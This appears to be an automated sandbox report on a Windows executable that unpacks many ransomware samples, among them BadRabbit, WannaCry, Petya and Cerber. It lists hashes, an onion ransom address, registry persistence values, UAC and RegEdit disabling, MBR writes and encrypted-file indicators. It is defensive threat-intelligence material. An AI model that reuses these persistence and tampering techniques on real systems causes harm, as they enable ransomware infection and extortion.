Analysis
max time kernel: 615s
max time network: 617s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-08-2022 00:19
-
Static task: static1
Behavioral task: behavioral1
Sample: smi_gui.exe
Resource: win10v2004-20220812-en
-
General
Target: smi_gui.exe
Size: 252KB
MD5: 1d89bb27ef47c0b20d7d3738c72b7585
SHA1: db99aa51411357ee323c27c5889df35353820341
SHA256: e0d25e982293a424a36c37dd778100785d24e24a0318e2111b2991c3a1ace120
SHA512: 99c98ff4af14d49e7ebceaf36842b3f024bcfa870509f64c6d7e3a2cf1fd6cfe548031b6c0823cbda602c57f9e3e8a15d804a6e8c527cd3d344357e23282d1a5
SSDEEP: 1536:Ya+XUOlv4HjcDPEUrSUtD272tfiH149DPEUr0JDPE7r+:Ya+EGgHgDswtaru9DsrJDse
Malware Config
Extracted: C:\Program Files\WinRAR\Rar.txt
-n@inclist.txt
Extracted: C:\Program Files\WinRAR\WhatsNew.txt
https
http
http://weirdsgn.com
http://icondesignlab.com
https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar
Extracted: C:\Readme.txt
http://caforssztxqzf2nm.onion
Signatures
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes: Endermanch@Birele.exe, reg.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\Endermanch@Birele.exe" | Endermanch@Birele.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe
-
Modifies system executable filetype association 2 TTPs 8 IoCs
Processes: uninstall.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | uninstall.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | uninstall.exe
-
Processes: reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Disables RegEdit via registry modification 2 IoCs
Processes: Endermanch@Krotten.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Endermanch@Krotten.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Endermanch@Krotten.exe
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes: Installer.exe
description | ioc | process
File opened for modification | C:\Windows\system32\DRIVERS\vlflt.sys | Installer.exe
File opened for modification | C:\Windows\system32\drivers\trufos.sys | Installer.exe
File created | C:\Windows\system32\drivers\trufos.sys | Installer.exe
File opened for modification | C:\Windows\system32\DRIVERS\SET2EC8.tmp | Installer.exe
File created | C:\Windows\system32\DRIVERS\SET2EC8.tmp | Installer.exe
-
Executes dropped EXE 49 IoCs
Processes:
pid | process
4420 | bitdefender_tsecurity.exe
4016 | agent_launcher.exe
3488 | bddeploy.exe
4168 | setuppackage.exe
4952 | installer.exe
3728 | winrar-x64-611.exe
4648 | ProductAgentService.exe
1732 | bdredline.exe
2752 | ProductAgentService.exe
1228 | ProductAgentService.exe
3040 | ProductAgentService.exe
4440 | ProductAgentService.exe
2516 | DiscoverySrv.exe
2424 | DiscoverySrv.exe
4484 | uninstall.exe
752 | ProductAgentService.exe
2480 | ProductAgentUI.exe
1020 | WatchDog.exe
4712 | WinRAR.exe
716 | wekDF21.tmp
4484 | installer.exe
3504 | Installer.exe
4268 | ProductAgentUI.exe
1976 | WinRAR.exe
3608 | WinRAR.exe
4404 | Endermanch@7ev3n.exe
4792 | system.exe
4824 | Endermanch@BadRabbit.exe
2868 | Endermanch@Birele.exe
2304 | Endermanch@Cerber5.exe
3496 | Endermanch@DeriaLock.exe
644 | Endermanch@InfinityCrypt.exe
4424 | Endermanch@Krotten.exe
2068 | Endermanch@NoMoreRansom.exe
3084 | Endermanch@Petya.A.exe
3728 | Endermanch@PolyRansom.exe
232 | Endermanch@PowerPoint.exe
820 | Endermanch@ViraLock.exe
1928 | Endermanch@WannaCrypt0r.exe
4524 | Endermanch@WinlockerVB6Blacksod.exe
2324 | Endermanch@Xyeta.exe
1432 | Fantom.exe
180 | sys3.exe
1256 | xMEwQkYA.exe
3776 | rmAkUQYk.exe
5500 | Endermanch@PolyRansom.exe
5560 | Endermanch@ViraLock.exe
5624 | 6402.tmp
5892 | system.exe
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: Endermanch@DeriaLock.exe
description | ioc | process
File opened for modification | C:\Users\Admin\Pictures\ResetStart.png.deria | Endermanch@DeriaLock.exe
File opened for modification | C:\Users\Admin\Pictures\SearchUndo.raw.deria | Endermanch@DeriaLock.exe
File opened for modification | C:\Users\Admin\Pictures\ConvertFromSync.raw.deria | Endermanch@DeriaLock.exe
File opened for modification | C:\Users\Admin\Pictures\ExitConnect.crw.deria | Endermanch@DeriaLock.exe
File opened for modification | C:\Users\Admin\Pictures\PopSubmit.png.deria | Endermanch@DeriaLock.exe
-
Registers COM server for autorun 1 TTPs 3 IoCs
Processes: uninstall.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" | uninstall.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" | uninstall.exe
-
Processes:
resource | yara_rule
behavioral1/memory/2868-222-0x0000000000400000-0x0000000000438000-memory.dmp | upx
behavioral1/memory/2868-228-0x0000000000400000-0x0000000000438000-memory.dmp | upx
behavioral1/memory/2068-225-0x0000000000400000-0x00000000005DE000-memory.dmp | upx
behavioral1/memory/2068-246-0x0000000000400000-0x00000000005DE000-memory.dmp | upx
behavioral1/memory/2868-262-0x0000000000400000-0x0000000000438000-memory.dmp | upx
behavioral1/memory/2324-255-0x0000000000400000-0x000000000044F000-memory.dmp | upx
-
Uses Session Manager for persistence 2 TTPs 1 IoCs
Creates Session Manager registry key to run executable early in system boot.
Processes: Installer.exe
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\BootExecute = 6100750074006f0063006800650063006b0020006100750074006f00630068006b0020002a0000000000 | Installer.exe
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Installer.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Installer.exe
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: bitdefender_tsecurity.exe, agent_launcher.exe, winrar-x64-611.exe, wekDF21.tmp, rundll32.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | bitdefender_tsecurity.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | agent_launcher.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | winrar-x64-611.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | wekDF21.tmp
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | rundll32.exe
-
Drops startup file 1 IoCs
Processes: Endermanch@DeriaLock.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe | Endermanch@DeriaLock.exe
-
Loads dropped DLL 64 IoCs
Processes (one row per DLL load, in the order recorded; consecutive repeats collapsed with a count):
pid | process
4952 | installer.exe (x5)
4648 | ProductAgentService.exe (x2)
4952 | installer.exe
1732 | bdredline.exe
2752 | ProductAgentService.exe (x4)
1228 | ProductAgentService.exe (x4)
3040 | ProductAgentService.exe (x3)
4952 | installer.exe
3040 | ProductAgentService.exe
4440 | ProductAgentService.exe (x3)
4952 | installer.exe
2516 | DiscoverySrv.exe (x4)
720 | regsvr32.exe
4440 | ProductAgentService.exe (x9)
3040 | ProductAgentService.exe
4440 | ProductAgentService.exe
2424 | DiscoverySrv.exe (x5)
4440 | ProductAgentService.exe (x2)
4952 | installer.exe
752 | ProductAgentService.exe (x4)
2480 | ProductAgentUI.exe (x10)
-
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes: Endermanch@Krotten.exe, Endermanch@ViraLock.exe, Endermanch@Birele.exe, reg.exe, Endermanch@PolyRansom.exe, xMEwQkYA.exe, rmAkUQYk.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rmAkUQYk.exe = "C:\\ProgramData\\yyosEMIQ\\rmAkUQYk.exe" | Endermanch@ViraLock.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Endermanch@Birele.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMEwQkYA.exe = "C:\\Users\\Admin\\vmkEcMcU\\xMEwQkYA.exe" | Endermanch@PolyRansom.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMEwQkYA.exe = "C:\\Users\\Admin\\vmkEcMcU\\xMEwQkYA.exe" | xMEwQkYA.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\Desktop\\Endermanch@Birele.exe" | Endermanch@Birele.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rmAkUQYk.exe = "C:\\ProgramData\\yyosEMIQ\\rmAkUQYk.exe" | rmAkUQYk.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: Endermanch@Cerber5.exe
description | ioc | process
File opened (read-only) | \??\t: | Endermanch@Cerber5.exe
File opened (read-only) | \??\a: | Endermanch@Cerber5.exe
File opened (read-only) | \??\b: | Endermanch@Cerber5.exe
File opened (read-only) | \??\h: | Endermanch@Cerber5.exe
File opened (read-only) | \??\l: | Endermanch@Cerber5.exe
File opened (read-only) | \??\m: | Endermanch@Cerber5.exe
File opened (read-only) | \??\q: | Endermanch@Cerber5.exe
File opened (read-only) | \??\s: | Endermanch@Cerber5.exe
File opened (read-only) | \??\x: | Endermanch@Cerber5.exe
File opened (read-only) | \??\y: | Endermanch@Cerber5.exe
File opened (read-only) | \??\i: | Endermanch@Cerber5.exe
File opened (read-only) | \??\k: | Endermanch@Cerber5.exe
File opened (read-only) | \??\p: | Endermanch@Cerber5.exe
File opened (read-only) | \??\z: | Endermanch@Cerber5.exe
File opened (read-only) | \??\g: | Endermanch@Cerber5.exe
File opened (read-only) | \??\n: | Endermanch@Cerber5.exe
File opened (read-only) | \??\v: | Endermanch@Cerber5.exe
File opened (read-only) | \??\w: | Endermanch@Cerber5.exe
File opened (read-only) | \??\e: | Endermanch@Cerber5.exe
File opened (read-only) | \??\f: | Endermanch@Cerber5.exe
File opened (read-only) | \??\j: | Endermanch@Cerber5.exe
File opened (read-only) | \??\o: | Endermanch@Cerber5.exe
File opened (read-only) | \??\r: | Endermanch@Cerber5.exe
File opened (read-only) | \??\u: | Endermanch@Cerber5.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
188 | freegeoip.app
-
Modifies WinLogon 2 TTPs 2 IoCs
Processes: Endermanch@Krotten.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail wordsia@notrix.de êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü.  îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû." | Endermanch@Krotten.exe
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: Endermanch@PowerPoint.exe, sys3.exe
description | ioc | process
File opened for modification | \??\PHYSICALDRIVE0 | Endermanch@PowerPoint.exe
File opened for modification | \??\PHYSICALDRIVE0 | sys3.exe
-
Drops file in System32 directory 48 IoCs
Processes: DrvInst.exe, DrvInst.exe, DrvInst.exe, DiscoverySrv.exe, DrvInst.exe
description | ioc | process
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.cat | DrvInst.exe
File created | C:\Windows\System32\DriverStore\drvstore.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\drvstore.tmp | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | DiscoverySrv.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EE44ECA143B76F2B9F2A5AA75B5D1EC6_847118BE2683F0C241D1D702F3A3F5F9 | DiscoverySrv.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CA4458E7366E94A3C3A9C1FE548B6D21_1593F3C3102A71FA61528AB81588ED09 | DiscoverySrv.exe
File created | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14CA.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14C9.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB2.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155 | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | DiscoverySrv.exe
File created | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14B8.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\drvstore.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.cat | DrvInst.exe
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b} | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.sys | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\trufos.cat | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14C9.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\trufos.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9} | DrvInst.exe
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | DrvInst.exe
File created | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB3.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.sys | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CA4458E7366E94A3C3A9C1FE548B6D21_1593F3C3102A71FA61528AB81588ED09 | DiscoverySrv.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14B8.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\Trufos.sys | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\Trufos.sys | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.cat | DrvInst.exe
File created | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB2.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.cat | DrvInst.exe
File created | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB4.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\vlflt.sys | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.cat | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | DiscoverySrv.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | DiscoverySrv.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{b48447da-d9f0-654a-9e22-54f6569164b9}\SET14CA.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\drvstore.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3 | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EE44ECA143B76F2B9F2A5AA75B5D1EC6_847118BE2683F0C241D1D702F3A3F5F9 | DiscoverySrv.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB3.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{79ed3549-7623-484f-ba3a-5f1bb9ef229b}\SET2FB4.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\Trufos.sys | DrvInst.exe
-
Drops file in Program Files directory 64 IoCs
Processes: Endermanch@InfinityCrypt.exe, installer.exe, Installer.exe, winrar-x64-611.exe, installer.exe, ProductAgentService.exe
description | ioc | process
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\vi-VN\productagentui.txtui | installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\redline\bdredline.bdch.xml | installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdpretraining.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdreinit.exe | Installer.exe
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files\WinRAR\Uninstall.lst | winrar-x64-611.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-sysinfo-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\pt-BR.txtui | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\packages\bd_commonfilesfolder.exe | Installer.exe
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\pt-PT.txtui | installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-conio-l1-1-0.dll | Installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-stdio-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\mfc140.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\vlflt.cat | Installer.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\BIBUtils.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\tr-TR\productagentui.txtui | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\btn-close.svg | installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\minimize_hover.svg | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images\show-pass-checked.svg | installer.exe
File opened for modification | C:\Program Files\WinRAR\UnRAR.exe | winrar-x64-611.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-convert-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\html\Agent\login2_no_net.html | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\img\icons\b-icon-popup.svg | installer.exe
File created | C:\Program Files\Bitdefender Agent\redline\bdnc.dll | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\es-ES.txtui | installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\ro-RO.txtui | installer.exe
File created | C:\Program Files\Bitdefender Agent\apps_data\com.bitdefender.cl | ProductAgentService.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdredline.bdch.xml | installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-environment-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\bdnc.dll | installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentDP.dll | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\pt-BR.txtui | installer.exe
File created | C:\Program Files\WinRAR\Uninstall.lst | winrar-x64-611.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-math-l1-1-0.dll | Installer.exe
